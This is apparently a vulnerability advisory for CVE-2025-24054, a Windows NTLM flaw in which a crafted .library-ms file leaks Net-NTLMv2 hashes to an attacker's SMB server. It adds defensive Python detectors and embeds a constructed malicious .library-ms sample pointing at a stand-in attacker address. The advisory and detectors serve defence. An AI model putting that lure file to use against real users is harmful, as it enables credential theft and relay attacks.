PT-2025-10806 · Microsoft · Windows Ntlm +1

J00Sean +1 · Published 2025-03-11 · Updated 2025-08-31 · CVE-2025-24054

CVSS v2.0: 7.8 (Vector: AV:N/AC:L/Au:N/C:C/I:N/A:N)

**Name of the Vulnerable Software and Affected Versions:**

Microsoft Windows (affected versions not specified)

**Description:**

A vulnerability in the Windows NTLM (NT LAN Manager) authentication component arises from external control of file names or paths: a file supplied by an attacker can dictate the path from which File Explorer loads a resource. Microsoft classes the impact as spoofing over a network by an unauthorized attacker.

The practical effect is credential theft with minimal user interaction, such as simply previewing a malicious file. A crafted `.library-ms` file (an XML library description consumed by File Explorer) names an attacker-controlled SMB server as its location; when Explorer renders the file, Windows connects to that server over SMB and automatically authenticates, leaking the user's NTLM credential material. What the attacker captures is the NTLM challenge-response (a Net-NTLMv2 hash), which can be cracked offline or relayed to other services that accept NTLM; it is not the raw NT hash.

The vulnerability is actively exploited in the wild. Campaigns have targeted government and private organizations in multiple countries, including Poland, Romania, Russia, Bulgaria, the Netherlands, Australia, and Turkey; approximately 10 attack campaigns had been observed as of late March 2025.
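The mechanism above is easy to triage on the file side: a `.library-ms` file is plain XML, and the place it sends Explorer is visible in its `<url>` elements. The scanner below is an added example, not code from the advisory or from Microsoft. It assumes the element layout of ordinary Windows library files (`libraryDescription` / `searchConnectorDescriptionList` / `simpleLocation` / `url` in the `http://schemas.microsoft.com/windows/2009/library` namespace); the two sample files are constructed, and the address 203.0.113.45 is a documentation address standing in for an attacker's SMB server. It lists every location URL and flags the ones that are UNC paths to hosts outside the local network.

```python
"""Triage scanner for Windows .library-ms files.

Added example (not code from the advisory or from Microsoft). A .library-ms
file is an XML "library description" that File Explorer renders; each
<simpleLocation><url> element names a place the library's contents live. When
that URL is a UNC path (\\\\host\\share), Explorer contacts the host over SMB
while rendering the file and Windows automatically answers the NTLM challenge,
which is the credential leak described above. The scanner lists every location
URL and flags those that point at hosts outside the local network.
"""
import ipaddress
import re
import xml.etree.ElementTree as ET

# Address ranges treated as "internal"; everything else is an outside host.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128",
)]

# UNC path: two leading backslashes, then the host up to the next separator.
UNC_RE = re.compile(r"^\\\\([^\\/]+)")

# Constructed sample modelled on the .library-ms layout. 203.0.113.45 is a
# documentation address standing in for an attacker-controlled SMB server.
SAMPLE_MALICIOUS = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>\\203.0.113.45\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed benign sample: a stock library pointing at a known folder.
SAMPLE_BENIGN = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def location_urls(xml_text):
    """Every <url> element in the file, in document order, namespace-agnostic."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    urls = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "url" and el.text:
            urls.append(el.text.strip())
    return urls


def unc_host(url):
    """Host part of a UNC path, or None when the URL is not UNC."""
    m = UNC_RE.match(url)
    return m.group(1) if m else None


def is_external_host(host, trusted=()):
    """True when the host is neither allowlisted nor an internal address.

    Bare NetBIOS-style names (no dot) resolve inside the local domain and are
    treated as internal; any other name or non-internal IP is external.
    """
    if host.lower() in {t.lower() for t in trusted}:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." in host
    return not any(ip in net for net in INTERNAL_NETS)


def scan_library(xml_text, trusted=()):
    """Return [(url, host, verdict)] for each location the file declares."""
    findings = []
    for url in location_urls(xml_text):
        host = unc_host(url)
        if host is None:
            verdict = "local"          # knownfolder:, drive-letter path, ...
        elif is_external_host(host, trusted):
            verdict = "EXTERNAL-UNC"   # rendering this file authenticates outward
        else:
            verdict = "internal-unc"
        findings.append((url, host, verdict))
    return findings


if __name__ == "__main__":
    for label, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        for url, host, verdict in scan_library(sample):
            print(f"{label:9} {verdict:13} {url}")
```

Run it over files pulled from mail quarantine or a user's Downloads folder; an `EXTERNAL-UNC` verdict means that merely rendering the file would have sent an NTLM challenge-response to that host. The `trusted` allowlist exists because a legitimate library may point at a named file server on a routable address; the scanner deliberately does not resolve hostnames, so it runs offline and never itself contacts the host in question.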

**Recommendations:**

Versions prior to the March 11, 2025 security update are vulnerable.

* Apply the March 11, 2025 security update or a later cumulative update.

* Disable NTLM where it is not required. Where it must remain, restrict outgoing NTLM traffic to remote servers so that workstations do not answer NTLM challenges from arbitrary hosts.

* Restrict use of the affected component, File Explorer, where the update cannot yet be applied, and treat `.library-ms` files from untrusted sources as hostile.

* Monitor for suspicious SMB authentication requests, in particular outbound SMB (TCP/445) connections from workstations to external or unknown hosts, which is the traffic a rendered malicious `.library-ms` file produces.

* Audit file shares and the UNC paths that files on them reference.
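The monitoring recommendation above is concrete enough to express as detection logic. The example below is added here and is not code from the advisory; it reads a constructed, simplified JSON-lines rendering of Sysmon Event ID 3 (network connection) records (field names `EventID`, `Computer`, `User`, `Image`, `DestinationIp`, `DestinationPort` follow Sysmon's, but the records themselves are invented) and alerts on any process opening TCP/445 to a host outside the internal ranges. 203.0.113.45 is a documentation address standing in for an attacker's SMB server; 10.20.1.7 stands in for a legitimate internal file server.

```python
"""Flag outbound SMB connections to hosts outside the local network.

Added example (not from the advisory). Input is a constructed, simplified
JSON-lines rendering of Sysmon Event ID 3 (network connection) records; a
real deployment would take the same fields from the event log or a SIEM.
A workstation process such as explorer.exe opening TCP/445 to a public address
is the traffic a rendered malicious .library-ms file produces, so it is the
signal to alert on.
"""
import ipaddress
import json

SMB_PORT = 445

# Address ranges treated as "internal"; everything else is an outside host.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128",
)]

# Constructed records. 203.0.113.45 is a documentation address standing in for
# an attacker's SMB server; 10.20.1.7 is an internal file server.
SAMPLE_EVENTS = r"""
{"EventID": 3, "Computer": "WS-042", "User": "CORP\\alice", "Image": "C:\\Windows\\explorer.exe", "DestinationIp": "203.0.113.45", "DestinationPort": 445, "Protocol": "tcp"}
{"EventID": 3, "Computer": "WS-042", "User": "CORP\\alice", "Image": "C:\\Windows\\explorer.exe", "DestinationIp": "10.20.1.7", "DestinationPort": 445, "Protocol": "tcp"}
{"EventID": 3, "Computer": "WS-042", "User": "CORP\\alice", "Image": "C:\\Program Files\\Browser\\browser.exe", "DestinationIp": "203.0.113.45", "DestinationPort": 443, "Protocol": "tcp"}
{"EventID": 1, "Computer": "WS-042", "User": "CORP\\alice", "Image": "C:\\Windows\\explorer.exe"}
"""


def is_internal_ip(addr):
    """True for RFC 1918, loopback and link-local addresses; False otherwise."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def suspicious_smb_connections(jsonl, trusted_ips=()):
    """Return one alert dict per outbound SMB connection to a non-internal host.

    Records that are not Event ID 3, not destined for TCP/445, or that go to
    an internal or explicitly trusted address are ignored.
    """
    alerts = []
    for raw in jsonl.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        if ev.get("EventID") != 3 or ev.get("DestinationPort") != SMB_PORT:
            continue
        dst = ev.get("DestinationIp", "")
        if dst in trusted_ips or is_internal_ip(dst):
            continue
        alerts.append({
            "host": ev.get("Computer"),
            "user": ev.get("User"),
            "image": ev.get("Image"),
            "dst": dst,
            "reason": "outbound SMB to non-internal host; NTLM credentials may have been sent",
        })
    return alerts


if __name__ == "__main__":
    for a in suspicious_smb_connections(SAMPLE_EVENTS):
        print(f"ALERT {a['host']} {a['user']} {a['image']} -> {a['dst']}:{SMB_PORT}")
```

Of the four constructed records only the first fires: the second is SMB to an internal server, the third is HTTPS rather than SMB, and the fourth is not a network event. In practice an alert of this kind is worth treating as a credential exposure for the named user (reset or monitor the account, and check whether NTLM relay targets exist) rather than as a mere anomaly, because by the time the connection is logged the challenge-response has already left the host.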

Related Identifiers

BDU:2025-02760
CVE-2025-24054

Affected Products

Windows
Windows Ntlm